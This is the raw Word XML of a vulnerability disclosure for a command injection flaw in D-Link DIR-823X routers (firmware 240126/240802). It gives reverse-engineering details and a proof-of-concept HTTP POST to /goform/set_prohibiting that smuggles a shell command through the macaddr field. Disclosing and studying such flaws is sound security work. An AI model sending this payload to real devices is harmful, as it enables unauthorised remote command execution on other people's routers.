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information"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Information</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vendor of the products:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">D-Link</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vendor's website:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId20">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.dlink.com.cn/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Reported by:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Wang Jinshuai(</w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">jinshuaiwang61@gmail.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">) , Zhao Jiangting(</w:t>
      </w:r>
      <w:hyperlink r:id="rId22">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">sta8r9@163.com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Affected products:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">DIR-823X AX3000 Series Routers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Affected firmware version:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">240126, 240802</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Firmware download address:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.dlink.com.cn/home/product?id=3118</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="25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A command injection vulnerability in D-Link DIR-823X Series Routers with firmware versions 240126/240802 allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/goform/set_prohibiting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">via the corresponding function, triggering remote command execution.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="29" w:name="vulnerability-details"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerability details</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">By reverse engineering the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sub_42232C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">function in this binary file, we can see that the value of the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">macaddr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">function is copied into the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variable via the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">snprintf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">function, after which the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function is executed. Therefore, by maliciously crafting the value of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">macaddr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, command execution can be triggered.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="2997833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mono7s.oss-cn-wuhan-lr.aliyuncs.com/image/2025030623277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function can be triggered by submitting a POST request to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/goform/set_prohibiting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="30" w:name="poc"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Poc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goform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set_prohibiting HTTP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Host: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FloatTok"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.122.130</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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Agent: Mozilla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(X11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Ubuntu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Linux x86_64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rv:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FloatTok"/>
        </w:rPr>
        <w:t xml:space="preserve">109.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">) Gecko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 Firefox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114.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Accept: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">*/*</w:t>
      </w:r>
      <w:r>
        <w:br/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Language: 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CN,zh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,en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Encoding: gzip, deflate</w:t>
      </w:r>
      <w:r>
        <w:br/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Type: application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www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urlencoded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With: XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:br/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Length: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Origin: http:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FloatTok"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.122.130</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection: close</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Referer: http:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FloatTok"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.122.130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login.html</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie: sessionid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00000000000000000000000000000000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00000000000000000000000000000000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">macaddr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">touch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set_prohibiting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">||&amp;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00000000000000000000000000000000</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:id="34" w:name="attack-demonstration"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attack Demonstration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="2436689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mono7s.oss-cn-wuhan-lr.aliyuncs.com/image/2025030623272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0" Target="http://www.dlink.com.cn/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId23" Target="http://www.dlink.com.cn/home/product?id=3118" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId21" Target="mailto:jinshuaiwang61@gmail.com" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId22" Target="mailto:sta8r9@163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dlink.com.cn/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId23" Target="http://www.dlink.com.cn/home/product?id=3118" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId21" Target="mailto:jinshuaiwang61@gmail.com" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId22" Target="mailto:sta8r9@163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2025-03-06T15:31:47Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-06T15:31:47Z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